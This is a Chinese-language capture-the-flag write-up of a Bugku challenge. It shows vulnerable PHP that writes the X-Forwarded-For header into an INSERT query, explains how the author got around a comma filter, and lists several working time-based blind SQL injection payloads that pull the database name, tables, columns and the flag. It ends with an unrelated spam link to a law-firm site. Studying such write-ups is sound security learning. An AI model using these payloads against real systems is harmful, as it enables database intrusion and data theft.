[Bugku] INSERT INTO注入
最近要复习基础,又回顾了一把sqli-labs结果发现还是有一些奇技淫巧没有收录进去,正好想起来bugku上有一道insert注入的题,特地写一写,记录一下。
开局送源码,hint是用python写个脚本吧。盲猜这个题得盲注了不然其他注入也不太用得上写脚本。
error_reporting(0);
function getIp()
{
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
明确注入点,是走的http
报头的x-forwarded-for
。 但是过滤了,
所以常规update和extractvalue的报错注入就没法用了。好在还有一个select case when xxx then xxx else xxx end;
而且由于逗号被过滤,导致substr
和substring
无法正常使用,所以得用 from 1 for 1
替代
开始先手注测试,抓包在请求头中加入X-Forwarded-For
X-Forwarded-For:127.0.0.1' and (select case when (length(database())=5) then sleep(5) else 1 end) and '1'='1
手测测出数据库长度为5,接下来写个通用注入语句就可以跑了.
payload如下:
127.0.0.1' and (select case when (ascii(substr((select database()) from 1 for 1))=119) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(table_name)from information_schema.tables where table_schema=database()))=14) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(column_name)from information_schema.columns where table_name='flag'))=4) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from 1 for 1))=102) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(flag)from flag))=32) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(flag)from flag) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
所有的payload
都写出来了,脚本就容易了,利用二分法,在header
里面添加X-Forwarded-For
用payload
赋值。
想想你的文章写的特别好https://www.jiwenlaw.com/